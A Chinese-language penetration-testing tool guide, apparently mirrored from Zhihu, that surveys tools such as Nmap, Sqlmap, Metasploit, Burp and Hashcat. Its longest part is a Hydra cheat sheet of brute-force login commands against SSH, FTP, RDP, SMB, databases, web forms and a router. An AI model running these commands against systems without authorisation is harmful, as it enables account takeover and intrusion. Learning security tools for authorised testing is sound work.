当前位置:网站首页>滲透測試 ( 1 ) --- 必備 工具、導航

滲透測試 ( 1 ) --- 必備 工具、導航

2022-07-06 15:50:00 擒賊先擒王

 

From:https://zhuanlan.zhihu.com/p/401413938

滲透測試實戰教學:https://www.zhihu.com/column/c_1334810805263515648

導航類網站:

關鍵字:滲透測試 工程師 養成之路 VIP、滲透測試 實戰

學習任何一個學科的時候,都有一個概念很重要:最少必要知識 ( MAKE : Minimal Actionable Knowledge and Experience )

在學習某項技能的時,要用最快的時間摸索清楚 最少必要知識 (MAKE) 都有哪些? 然後迅速地掌握它們,這樣就實現了 "快速入門",然後就可以開始 動手實踐,然後在實踐中驗證理論、加深理解,同時繼續擴展學習。而學習黑客也是同樣的道理,對於新手小白的第一課應該是以掌握基礎的安全工具為主,這樣在學習的同時可以進行實踐,驗證所學的知識,同時加以擴展,這樣學習效率會大大提昇。

github 工具集合

​github 滲透測試資源集合:https://github.com/enaqx/awesome-pentest
​github 搜索:https://github.com/search?q=pentest
​github 搜索:https://github.com/search?q=penetration

 國外整理的一套在線滲透測試資源合集:https://blog.csdn.net/h4ck0ne/article/details/50570687

1、常用工具

Kali Linux

Kali 的前身是 BackTrack Linux,由進攻性安全部門的專業人員維護,自帶很多黑客工具,是黑客專用的操作系統。Kali 最擅長進攻,而不是防守,而且很容易被利用。所以不要在你的 Kali 虛擬機中保存你的重要機密文件和安裝在物理機上。

Nmap

一款非常强大的主機發現和端口掃描工具,而且 nmap 運用自帶的脚本,還能完成漏洞檢測,同時支持多平臺。作為端口掃描器的鼻祖,nmap (network mapper) 是一種久經考驗的測試工具,很少有人能離開它。哪些端口是開放的? 那些端口上運行著什麼? 這是 pentester 在測試階段必不可少的信息,nmap 通常是這項工作的最佳工具。盡管偶爾會有不懂技術的高管歇斯底裏地錶示,某個未知方正在對企業進行端口掃描,但 nmap 本身是完全合法的,就像敲鄰居的前門,看看是否有人在家一樣。許多合法的組織,如保險公司、Shodan 和 Censys 這樣的互聯網制圖師,以及 BitSight 這樣的風險評分者,都會定期使用專門的端口掃描軟件(通常是 nmap 的競爭對手 masscan 或 zmap )掃描整個 IPv4 範圍,以繪制大大小小企業的公共安全態勢。也就是說,惡意的攻擊者也會進行端口掃描,所以需要進行日志記錄,以便將來參考。

官網:https://nmap.org/

黑客工具之Nmap詳細使用教程:https://zhuanlan.zhihu.com/p/395344698

Sqlmap

在 sqlmap 之前,必須精心設計SQL,然後注入測試,看有沒有 SQL 注入漏洞。Sqlmap 出現後,可以使用 sqlmap 自動檢測服務器上的數據庫是否存在的SQL注入漏洞。

  • Sqlmap 開源的 SQL 注入漏洞檢測的工具,能够檢測動態頁面中的 get/post 參數,cookie,http頭,還能够查看數據,文件系統訪問,甚至能够操作系統命令執行。
  • 檢測方式:布爾盲注、時間盲注、報錯注入、UNION聯合查詢注入、堆疊注入
  • 支持數據庫:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb

官網:https://sqlmap.org/
github:https://github.com/sqlmapproject/sqlmap

教程 ( 黑客工具之Sqlmap詳細使用教程 ):https://zhuanlan.zhihu.com/p/394955217

Metasploit Framework ( MSF )

對於大多數的測試者而言,Metasploit 自動化了大量以前繁瑣的工作,並且真正成為 "世界上最常用的滲透測試框架" ,正如它的網站所鼓吹的那樣。Metasploit 是一個由Rapid7 提供商業支持的開源項目,對於防禦者來說,它是保護他們的系統免受攻擊的必備工具。Metasploit Framework 可以黑掉整個星球。Metasploit Framework(MSF) 是一款開源安全漏洞檢測工具,附帶數千個已知的軟件漏洞,並保持持續更新。Metasploit 可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區冠以“可以黑掉整個宇宙”之名。剛開始的 Metasploit 是采用 Perl 語言編寫的,但是再後來的新版中,改成了用 Ruby 語言編寫的了。kali 自帶 Metasploit 社區版。專業版是收費的。

官網:https://www.metasploit.com/

教程:

BurpSuite

Burp Suite 是一個非常有效的web漏洞掃描器。同時也是用於攻擊 Web 應用程序的集合平臺,包含了許多工具。BurpSuite 為這些工具設計了許多接口,以加快攻擊應用程序的過程。所有工具都共享一個請求,並能處理對應的HTTP消息、持久性、認證、代理、日志、警報。

Burp 的競爭對手 Nessus 也提供了同樣有效(且價格相似)的產品。

BurpSuite 分為 社區版、專業版。社區版功能很弱,專業版收費。

教程:黑客工具之BurpSuite詳解:https://zhuanlan.zhihu.com/p/401134233

Zed Attack Proxy

沒錢買 Burp Suite pro 時,可以使用 OWASP 的 Zed 攻擊代理(ZAP)幾乎同樣有效,而且它是免費的軟件。顧名思義,ZAP比特於瀏覽器和測試網站之間,允許您攔截(也就是中間人)流量來檢查和修改。它缺乏Burp的許多花哨功能,但它的開源許可使其更容易、更便宜地大規模部署,而且它是一個很好的初學者工具,可以讓他們了解 web 流量到底有多脆弱。

ZAP 的競爭對手 Nikto 也提供了類似的開源工具。

Nikto

Nikto 是一款開源的(GPL)Web服務器掃描器,它可以對 Web 服務器進行全面的多種掃描,包含超過3300種有潜在危險的文件CGIs,超過625種服務器版本,以及超過230種特定服務器問題。

官網:http://www.cirt.net/nikto2

Netcat

Netcat 擁有 "瑞士軍刀" 的美譽。nc 小巧强悍,可以讀寫 TCP 或 UDP 網絡連接,它被設計成一個可靠的後端工具,能被其它的程序或脚本直接驅動。同時,它又是一個功能豐富的網絡調試和開發工具,因為它可以建立你可能用到的幾乎任何類型的連接,以及一些非常有意思的內建功能,它基於socket協議工作。在滲透測試領域通常利用它來反彈 shell。

黑客工具之Netcat詳細使用教程:https://zhuanlan.zhihu.com/p/397058259

Wireshark

Wireshark 用來處理網絡傳輸的流量。雖然Wireshark 通常用於深入研究日常 TCP/IP 連接問題,但它支持對數百個協議的分析,包括對其中許多協議的實時分析和解密支持。如果您是測試新手,Wireshark 是一個必須學習的工具。Wireshark(原名Ethereal)是一個網絡封包分析軟件。可以用來交互式分析網絡流量(網絡協議)。網絡封包分析軟件的功能是截取網絡封包,並盡可能顯示出最為詳細的網絡封包資料。

官網:https://www.wireshark.org/

aircrack-ng

aircrack-ng 是 無線安全審計工具。如今,由於配置不當、密碼錯誤或加密協議過時,致使破解 wifi 常常是可能的。Aircrack-ng 是許多人的首選。Aircrack 是一套用於破解 WEP 和 WPA 的工具套裝,一般用於無線網絡的密鑰破解,從而非法進入未經許可的無線網絡,是最快的 WEP / WPA 破解工具。只要一旦收集到足够的加密數據包,利用它就可以破解40到512比特的WEP密匙,也可以通過高級加密方法或暴力破解來破解 WPA1 或2網絡。

官網:http://aircrack-ng.org/

2、滲透測試 工具

whatweb

whatweb 是kali中網站指紋識別的工具,使用Ruby語言開發。whatweb可識別web技術,包括內容管理系統(CMS)、博客平臺、統計/分析包、JavaScript庫,Web服務器和嵌入式設備等。它有超過900個插件,每個插件都能識別不同的東西。Whatweb還可以識別版本號,電子郵件地址、賬戶ID、Web框架模塊,SQL錯誤等

黑客工具之 whatweb 詳細使用教程:https://zhuanlan.zhihu.com/p/396345123

網站目錄掃描工具 ( 禦劍、dirbuster、Webdirscan、wfuzz )

網站後臺掃描工具都是利用目錄字典進行爆破掃描,字典越多,掃描到的結果也越多。

黑客工具之網站後臺掃描工具詳細使用教程:https://zhuanlan.zhihu.com/p/395689804

Google Hacking

Google Hacking 是利用穀歌搜索的强大,來在浩瀚的互聯網中搜索到我們需要的信息。輕量級的搜索可以搜素出一些遺留後門,不想被發現的後臺入口,中量級的搜索出一些用戶信息泄露,源代碼泄露,未授權訪問等等,重量級的則可能是mdb文件下載,CMS 未被鎖定install頁面,網站配置密碼,php遠程文件包含漏洞等重要信息

黑客工具之 Google Hacking 的簡單用法:https://zhuanlan.zhihu.com/p/400365865

3、漏洞掃描工具

Nessus

最好的 UNIX 漏洞掃描工具。Nessus 號稱是世界上最流行的漏洞掃描程序,全世界有超過75000個組織在使用它。該工具提供完整的電腦漏洞掃描服務,並隨時更新其漏洞數據庫。Nessus 不同於傳統的漏洞掃描軟件,Nessus 可同時在本機或遠端上遙控,進行系統的漏洞分析掃描。Nessus也是滲透測試重要工具之

黑客工具之Nessus詳細使用教程:https://zhuanlan.zhihu.com/p/395459622

AppScan

AppScan是IBM的一款web安全掃描工具,可以利用爬蟲技術進行網站安全滲透測試,根據網站入口自動對網頁鏈接進行安全掃描,掃描之後會提供掃描報告和修複建議等

黑客工具之AppScan詳細使用教程:https://zhuanlan.zhihu.com/p/396532847

4、社工爆破

Hashcat

HashCat主要分為三個版本:Hashcat、oclHashcat-plus、oclHashcat-lite。這三個版本的主要區別是:HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多個HASH,並且支持的算法高達77種。oclHashcat-lite只支持使用GPU對單個HASH進行破解,支持的HASH種類僅有32種,但是對算法進行了優化,可以達到GPU破解的最高速度。。如果只有單個密文進行破解的話,推薦使用oclHashCat-lite。

黑客工具之 Hashcat 詳解:https://zhuanlan.zhihu.com/p/401363280

hydra

github:https://github.com/vanhauser-thc/thc-hydra

Hydra 是一個 猜測(破解) 有效登錄名(密碼對) 的非常强大的暴力破解工具。它是由著名的黑客組織THC開發的一款開源暴力破解工具。Hydra 是一個驗證性質的工具,主要目的是:展示安全研究人員從遠程獲取一個系統認證權限

Hydra 可以破解在線密碼,比如 SSH 或FTP登錄、IMAP、IRC、RDP等。還可以指定密碼字典進行破解。諸如 Hydra 之類的工具會提醒我們,為什麼限制密碼嘗試的次數,以及在少量登錄嘗試後斷開用戶連接可以成功减輕攻擊者的防禦能力。

支持的服務:adam6500 asterisk cisco cisco-enablecobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap [s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

相關使用:

用法:hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

參數

選項:
    -R   恢複爆破(如果破解中斷,下次執行 hydra -R /path/to/hydra.restore 可以繼續任務)
    -I                     忽略存在的文件(不要等待 10 秒)
    -S                     指定爆破時使用 SSL 鏈接
    -s PORT                指定端口,適用於攻擊目標端口非默認的情况。例如http服務使用非80端口             
    -l LOGIN 或 -L FILE    小寫L指定用戶名進行破解。大寫L 指定用戶名字典進行破解
    -p PASS 或 -P FILE     小寫P指定密碼進行破解,很少使用。大寫P指定密碼字典進行破解(最常用)
    -x MIN:MAX:CHARSET     生成密碼字典,輸入 "-x -h" 獲取幫助
    -y                     禁止在暴力破解中使用符號,見上文
    -r                     對選項 -x 使用非隨機洗牌方法
    -e nsr                 n:空密碼試探。s:使用指定賬戶和密碼試探嘗試。r:反向登錄
    -u                     知道密碼時,只循環用戶。(有效!隱含在 -x 中)
    -C FILE                冒號分隔的 login:pass 字典文件。而不是 -L/-P 選項
    -M FILE                指定目標 ip 列錶文件,批量破解。
                           注意:目標列錶文件存儲格式必須為 "地址:端口"
    -o FILE                將找到的登錄名/密碼對寫入 FILE 而不是 stdout
    -b FORMAT              指定 -o FILE 的格式:text(default), json, jsonv1
    -f / -F                只要爆破成功一個就停止爆破(-M:-f 每個主機,-F 全局)
    -t TASKS               指定爆破時的任務數量(可以理解為線程數),默認為16
    -T TASKS               整體並行運行的 TASKS 數 (對於 -M,默認值:64)
    -w / -W time           響應等待時間 (32) / 每個線程之間的連接 (0)
    -c TIME                在所有線程上每次登錄嘗試的等待時間(强制 -t 1)
    -4 / -6                使用 IPv4(默認)/ IPv6 地址(總是放在 [] 中也放在 -M 中)
    -v / -V / -d           詳細模式 / 每次嘗試顯示登錄+通過 / 調試模式
    -O                     使用舊的 SSL v2 和 v3
    -K                     不重做失敗的嘗試(有利於 -M 大規模掃描)
    -q                     不打印有關連接錯誤的消息
    -U                     服務模塊使用詳情
    -m                     特定於模塊的 OPT 選項,有關信息,請參閱 -U 輸出
    -h                     更多命令行選項(完整幫助)
    server   代錶要攻擊的目標(單個),多個目標時請使用 -M 參數。目標:DNS、IP 或 192.168.0.0/24
    service  要破解的服務(有關支​​持的協議,請參見下文)。
             例如 http,在hydra中,不同協議會使用不同的模塊來爆破,
             hydra 的http-get 和 http-post 模塊就用來爆破基於 get 和 post 請求的頁面
    OPT      爆破模塊的額外參數,可以使用 -U 參數來查看模塊支持那些參數。
             例如命令:hydra -U http-get


使用 HYDRA_PROXY_HTTP 或 HYDRA_PROXY 環境變量進行代理設置。
例如。 
    % export HYDRA_PROXY=socks5://l:[email protected]:9150(或:socks4://connect://)
    % export HYDRA_PROXY=connect_and_socks_proxylist.txt(最多 64 個條目)
    % 導出 HYDRA_PROXY_HTTP=http://login:[email protected]:8080
    % export HYDRA_PROXY_HTTP=proxylist.txt(最多 64 個條目)

例子:
    hydra -l user -P passlist.txt ftp://192.168.0.1
    hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
    hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
    hydra -l admin -p password ftp://[192.168.0.0/24]/
    hydra -L logins.txt -P pws.txt -M targets.txt ssh

常用參數

  • -l 指定單個用戶名,適合在知道用戶名爆破用戶名密碼時使用
  • -L 指定多個用戶名,參數值為存儲用戶名的文件的路徑(建議為絕對路徑)
  • -p 指定單個密碼,適合在知道密碼爆破用戶名時使用
  • -P 指定多個密碼,參數值為存貯密碼的文件(通常稱為字典)的路徑(建議為絕對路徑)
  • -e nsr 額外的選項,n:空密碼試探,s:使用指定賬戶和密碼試探。r:反向登錄
  • -C 當用戶名和密碼存儲到一個文件時使用此參數。注意,文件(字典)存儲的格式必須為 “用戶名:密碼” 的格式。
  • -M 指定目標ip列錶文件,批量破解。注意:列錶文件存儲格式必須為 “地址:端口”
  • -o file 指定結果輸出文件
  • -t 指定爆破時的任務數量(可以理解為線程數),默認為16
  • -s 指定端口,適用於攻擊目標端口非默認的情况。例如:http服務使用非80端口
  • -S 指定爆破時使用 SSL 鏈接
  • -R 恢複爆破(如果破解中斷了,下次執行 hydra -R /path/to/hydra.restore 就可以繼續任務。)
  • -w time 設置最大超時時間,單比特
  • -v/-V 顯示爆破的詳細信息
  • -f  只要爆破成功一個就停止爆破
  • -x 自定義密碼。
  • server 代錶要攻擊的目標(單個),多個目標時請使用 -M 參數
  • service 攻擊目標的服務類型(可以理解為爆破時使用的協議),例如 http,在hydra中,不同協議會使用不同的模塊來爆破,hydra 的http-get 和 http-post 模塊就用來爆破基於 get 和 post 請求的頁面
  • OPT 爆破模塊的額外參數,可以使用 -U 參數來查看模塊支持那些參數,例如命令:hydra -U http-get

注意:

  • 1. 自己創建字典,然後放在當前的目錄下或者指定目錄。
  • 2. 參數可以統一放在最後,格式比如: hydra ip 服務 參數
  • 3. 知道用戶名,不知道密碼,比如web登錄破解,直接用 -l 就可以,然後剩餘時間破解密碼。
  • 4. 缺點,如果目標網站登錄時候需要驗證碼就無法破解。
  • 5. man hydra 最萬能。
  • 6. 或者 hydra -U http-form 等查看具體幫助。

示例:hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

各種協議破解匯總

破解 ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解 ftp
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
hydra -L 用戶名字典 -P 密碼字典 -t 6 -e ns IP地址 -v

get 方式提交,破解 web 登錄:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -v -e ns IP地址 http-get /admin/
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -v -e ns -f IP地址 http-get /admin/index.php

post 方式提交,破解 web 登錄
hydra -f -l 用戶名 -P 密碼字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
參數說明:

  • # /index.php …這個是登錄的 url
  • # 後門是 POST 的數據 其中的用戶名密碼使用 USER PASS 來代替
  • # 然後是如果登錄出錯 會出現的字符 。。。然後開始破解
  • -t 同時線程數3
  • -l 用戶名是admin,字典pass.txt,保存為out.txt,
  • -f 當破解了一個密碼就停止, 
  • 目標ip 10.36.16.18
  • http-post-form 錶示破解是采用 http 的 post 方式提交的錶單密碼破解,

破解 https
hydra -m /index.php -l 用戶名 -P 密碼字典.txt IP地址 https
hydra -m /index.php -l muts -P pass.txt IP https
hydra -m /index.php -l username -P pass.txt IP https

破解 語音通訊工具teamspeak
hydra -l 用戶名字典 -P 密碼字典.txt -s 端口號 -vV ip teamspeak
hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak

破解cisco
hydra -P 密碼字典 IP地址 cisco
hydra -m cloud -P 密碼字典 IP地址 cisco-enable
hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt IP cisco-enable

破解 smb
hydra -l 用戶名字典 -P 密碼字典 IP地址 smb
hydra -l administrator -P pass.txt 10.36.16.18 smb

破解 pop3
hydra -l 用戶名 -P 密碼字典.txt my.pop3.mail pop3
hydra -l muts -P pass.txt my.pop3.mail pop3

破解 rdp ( 遠程桌面 )
hydra ip地址 rdp -l administrator -P 密碼字典.txt -V
hydra ip rdp -l administrator -P pass.txt -V

破解 http-proxy
hydra -l admin -P 字典.txt http-proxy://IP地址
hydra -l admin -P pass.txt http-proxy://IP

破解 imap
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解 telnet
hydra ip地址 telnet -l 用戶字典.txt -P 密碼字典.txt -t 32 -s 23 -e ns -f -V
hydra IP telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V

爆破 mysql
hydra -l root -P /root/pentest/passwd.txt mysql://192.168.0.100 -f -o /root/pentest/mysql.txt -V

其他
oracle
hydra -P /root/passwd oracle://192.168.0.100 -f -o /root/oracle.txt –v
redis
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis
postgresql 
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 postgresql

路由器破解

hydra -l admin -x 6:10:[email protected]#$%^&()-= -t 8 192.168.1.1 http-get /

  • -l admin 為嘗試破解的用戶名。
  • # -x 6:10:1a. 錶示枚舉的密碼由 數字、小寫字母和單字符’.'等等組成,長度為 6 - 10 比特。-t 8 錶示分 8 個並行任務進行爆破嘗試。192.168.1.1 為 Router 地址。http-get 為破解方式(協議)

xhydra --- hydra 的可視化工具

在 kali 命令行中輸入 xhydra 即可開啟

Kali 自帶密碼字典

暴力破解能成功最重要的條件還是要有一個强大的密碼字典!Kali默認自帶了一些字典,在 /usr/share/wordlists 目錄下

dirb
big.txt #大的字典
small.txt #小的字典
catala.txt #項目配置字典
common.txt #公共字典
euskera.txt #數據目錄字典
extensions_common.txt #常用文件擴展名字典
indexes.txt #首頁字典
mutations_common.txt #備份擴展名
spanish.txt #方法名或庫目錄
others #擴展目錄,默認用戶名等
stress #壓力測試
vulns #漏洞測試

dirbuster
apache-user-enum-** #apache用戶枚舉
directories.jbrofuzz #目錄枚舉
directory-list-1.0.txt #目錄列錶大,中,小 big,medium,small

fern-wifi
common.txt #公共wifi賬戶密碼

metasploit下有各種類型的字典
wfuzz  模糊測試,各種字典

John the Ripper

一款强大的、簡單的以及支持多平臺的密碼哈希破解器。這個密碼破解程序是開源的,用於離線密碼破解。John 可以使用一組可能的密碼,並對它們進行變更,將“a”替換為“@”,將“s”替換為“5”,以此類推。或者它可以使用强大的硬件無限次運行,直到找到密碼為止。考慮到絕大多數人使用的是簡單的短密碼,John通常能成功破解加密。

其他 Web 安全工具

Samurai Web Security Framework

一個基於Live Linux環境下的預置了Web滲透測試的系統,同時也包含了多款優秀的開源和免費測試工具。這個發行版主要關注對網站的攻擊,它使用最好的免費開源的工具攻擊和入侵網站。開發者已經把包括偵查、映射、探索和利用的攻擊的4個步驟都集成到了發行版中。

官網:https://www.inguardians.com/

Websecurify

一個强大的 Web 應用程序安全測試環境,由底層向上提供了自動和手動的脆弱性測試技術的最佳組合。

官網:https://websecurify.com/
 

CyberChef ( 網絡廚師 )

GitHub 鏈接:https://github.com/gchq/CyberChef

CyberChef 是英國情報機構政府通信總部(GCHQ)發布了一款新型的開源 Web 工具,為安全從業人員分析和解密數據提供了方便。

​GCHQ 在 GitHub 主頁上是這麼定比特 CyberChef 的:CyberChef 是一個簡單、直觀的web應用程序,用於在web瀏覽器中執行各種網絡操作。這些操作包括簡單的編碼(如XOR或Base64)、更複雜的加密(如AES、DES和Blowfish)、創建二進制文件和hexdump、數據的壓縮和解壓縮、計算散列和校驗和、IPv6和X.509解析、更改字符編碼等。

CyberChef 是一個Web工具,直接訪問:https://gchq.github.io/CyberChef/ 即可使用。右上角 About/Support 可以查看一些常見問題和解答。例如該工具的功能:

解碼 Base64 編碼的字符串
將日期和時間轉換為不同的時區
解析 Teredo IPv6 地址
從 hexdump 轉換數據,然後解壓縮
解密和反匯編 shellcode
將多個時間戳顯示為完整日期
對不同類型的數據進行不同的操作
使用部分輸入作為操作的參數

主區域有四個窗口,分別是 Operations、Recipe、Input、Output

  • Operations:選擇需要進行的操作,是編碼還是加解密,或者其他操作
  • Recipe:相關操作需要的參數
  • Input:輸入數據
  • Output:輸出結果

以 MD5 編碼為例:Operations ---> Hashing ---> "雙擊 MD5" ,Recipe 不需要,然後在 Input 中輸入要編碼的數據,Output 中就出現了結果

  • STEP:當不知道怎麼操作時,點擊 step 會每一步的操作提示
  • BAKE:當參數輸入完後,點擊 BAKE 會執行並生成結果
  • Auto Bake :會自動生成執行並生成結果

其他工具

  • 3、OpenVAS:OpenVAS 是開放式漏洞評估系統,也可以說它是一個包含著相關工具的網絡掃描器。其核心部件是一個服務器,包括一套網絡漏洞測試程序,可以檢測遠程系統和應用程序中的安全問題。
  • 7、Kismet :一款超强的無線嗅探器
  • 8、Tcpdump :最經典的網絡監控和數據捕獲嗅探器
  • 9、Cain and Abel : Windows平臺上最好的密碼恢複工具
  • 11、Ettercap :為交換式局域網提供更多保護
  • 13、Ping / telnet / dig / traceroute / whois / netstat :基本命令
  • 15、THC Hydra :支持多種服務的最快的網絡認證破解器
  • 16、Paros proxy : 網頁程序漏洞評估代理
  • 17、Dsniff :一款超强的網絡評估和滲透檢測工具套裝
  • 18、NetStumbler : 免費的Windows 802.11嗅探器
  • 19、THC Amap :一款應用程序指紋掃描器
  • 20、GFI LANguard :一款Windows平臺上的商業網絡安全掃描器
  • 24、Sysinternals :一款强大的非常全面的Windows工具合集
  • 25、Retina : eEye出品的商業漏洞評估掃描器
  • 27、L0phtcrack : Windows密碼猜測和恢複程序
  • 28、Scapy :交互式數據包處理工具
  • 29、Sam Spade : Windows網絡查詢免費工具
  • 30、GnuPG / PGP :對您的文件和通訊進行高級加密
  • 31、Airsnort : 802.11 WEP加密破解工具
  • 33、P0f :萬能的被動操作系統指紋工具
  • 35、WebScarab :一個用來分析使用HTTP和HTTPS協議的應用程序框架
  • 36、http://www.ntop.org/Ntop :網絡通訊監控器
  • 37、Tripwire :祖爺爺級的文件完整性檢查器
  • 38、Ngrep :方便的數據包匹配和顯示工具
  • 39、Nbtscan : 在Windows網絡上收集NetBIOS信息
  • 40、WebInspect :强大的網頁程序掃描器
  • 42、Xprobe2 :主動操作系統指紋工具
  • 43、EtherApe : EtherApe是Unix平臺上的模仿etherman的圖形界面網絡監控器
  • 44、Core Impact : 全自動的全面入侵檢測工具
  • 45、IDA Pro : Windows或Linux反編譯器和調試器
  • 46、SolarWinds : 網絡發現/監控/攻擊系列工具
  • 47、Pwdump :一款Windows密碼恢複工具
  • 48、LSoF :打開文件列錶
  • 49、RainbowCrack :極具創新性的密碼哈希破解器
  • 50、Firewalk :高級路由跟踪工具
  • 51、Angry IP Scanner : 一款非常快的Windows IP 掃描器和端口掃描器
  • 52、RKHunter : 一款Unix平臺上的Rootkit檢測器
  • 53、Ike-scan : VPN檢測器和掃描器
  • 54、Arpwatch : 持續跟踪以太網/IP地址配對,可以檢查出中間人攻擊
  • 55、KisMAC : 一款Mac OS X上的圖形化被動無線網絡搜尋器
  • 56、OSSEC HIDS :一款開源的基於主機的入侵檢測系統
  • 57、Openbsd PF : OpenBSD數據包過濾器
  • 58、Nemesis :簡單的數據包注入
  • 59、Tor :匿名網絡通訊系統
  • 60、Knoppix :一款多用途的CD或DVD光盤自啟動系統
  • 61、ISS Internet Scanner :應用程序漏洞掃描器
  • 62Fport : Foundstone出品的加强版netstat
  • 63、chkrootkit : 本地rootkit檢測器
  • 64、SPIKE Proxy : HTTP攻擊
  • 65、OpenBSD :被認為是最安全的操作系統
  • 66、Yersinia :一款支持多協議的底層攻擊工具
  • 67、Nagios :一款開源的主機、服務和網絡監控程序
  • 68、Fragroute/Fragrouter :一款網絡入侵檢測逃避工具集
  • 69、X-scan :一款網絡漏洞掃描器
  • 70、Whisker/libwhisker : Rain.Forest.Puppy出品的CGI漏洞掃描器和漏洞庫
  • 71、Socat :雙向數據傳輸中繼
  • 72、Sara :安全評審研究助手
  • 73、QualysGuard :基於網頁的漏洞掃描器
  • 74、ClamAV :一款UNIX平臺上的基於 GPL 的反病毒工具集
  • 75、cheops / cheops-ng :提供許多簡單的網絡工具,例如本地或遠程網絡映射和識別計算機操作系統
  • 76、Burpsuite :一款網頁程序攻擊集成平臺
  • 77、Brutus :一款網絡驗證暴力破解器
  • 78、Unicornscan :另類端口掃描器
  • 79、Stunnel :用途廣泛的SSL加密封裝器
  • 80、Honeyd : 您私人的honeynet
  • 81、Fping :一個多主機同時ping掃描程序
  • 82、BASE :基礎分析和安全引擎(Basic Analysis and Security Engine)
  • 83、Argus : IP網絡事務評審工具
  • 84、Wikto :網頁服務器評估工具
  • 85、Sguil :網絡安全監控器命令行分析器
  • 86、Scanrand :一個异常快速的無狀態網絡服務和拓樸結構發現系統
  • 87、IP Filter : 小巧的UNIX數據包過濾器
  • 88、Canvas :一款全面的漏洞檢測框架
  • 89、VMware :多平臺虛擬軟件
  • 90、Tcptraceroute : 一款基於TCP數據包的路由跟踪工具
  • 91、SAINT :安全管理綜合網絡工具
  • 92、OpenVPN :全功能SSL VPN解决方案
  • 93、OllyDbg :匯編級Windows調試器
  • 94、Helix : 一款注重安全防護的Linux版本
  • 95、Bastille : Linux、Mac OS X和HP-UX的安全加强脚本
  • 96、Acunetix Web Vulnerability Scanner :商業漏洞掃描器
  • 97、TrueCrypt :開源的Windows和Linux磁盤加密軟件
  • 98、Watchfire AppScan :商業網頁漏洞掃描器
  • 99、N-Stealth :網頁服務器掃描器
  • 100、MBSA :微軟基准安全分析器(Microsoft Baseline Security Analyzer)

滲透工具 使用指南

 From:https://www.kancloud.cn/wintry/p-tools/598518

信息 收集 工具

nmap

掃描之王、端口掃描神器。

P0f

p0f 采用被動的方式方法探測目標主機的操作系統類型。這個程序通過自身發出的 TCP 包分析操作系統類型。通過 ping 數據包和 TTL 的長度判斷 windows 和 linux。

netdiscover

基於 ARP 的網絡掃描工具 netdiscover,ARP 是將 IP 地址轉化物理地址的網絡協議。通過該協議,可以判斷某個 IP 地址是否被使用,從而發現網絡中存活的主機。

使用很簡單(掃描本地網絡):netdiscover -r 192.168.146.0/24    // 使用本機IP段

Sparta( 斯巴達 )

工具官網:http://sparta.secforce.com/

Sparta 是 nmap、nikto、hydra 等工具的集合,利用各個優秀工具的結合,使滲透測試更加便捷。

sudo apt install python3-sqlalchemy python3-pyqt5 wkhtmltopdf
apt-get install ldap-utils rwho rsh-client x11-apps finger
cd /usr/share/
git clone https://github.com/secforce/sparta.git

把 sparta 文件放到 /usr/bin/ 目錄下,並添加執行權限,然後在 kali 用戶下 ( 不是 root 用戶) 終端執行命令:sudo python sparta.py &

  • 增加掃描測試網段,程序會自動調用 nmap 開始掃描,根據 nmap 的掃描結果,nikto 會自動加載結果,展開更加精確的掃描。
  • 針對 nmap 掃出來的服務展開,特定使用,如:利用 dirbuster 進行目錄爆破,利用webslayer 進行 web 指紋識別。單個或多個指定 ip 的使用顯示在 tools 欄中:
  • 對於一些可以爆破解的地方可以調用hydra進行暴力破解:

相關使用:

用 Sparta 信息收集掃描爆破集成工具:https://www.bilibili.com/read/cv14115759

Kali工具庫之Sparta(斯巴達)--- 信息收集掃描爆破集成:https://zhuanlan.zhihu.com/p/31676357

wafw00f

這個小工具用來探測目標防火牆信息。
github 地址:https://github.com/EnableSecurity/wafw00f
命令 ( 就是這麼簡單 ):wafw00f http://www.51xkx.cn

在線工具

漏洞 掃描、分析

Nessus

最流行的漏洞掃描工具。

OWASP-ZAP

這是 OWASP 出品的一款安全測試工具,可掃描SQL注入、XSS、目錄遍曆的安全隱患。(kali 內置)使用方法很簡單,直接填上域名自動掃描即可。

AWVS 和 AppScan

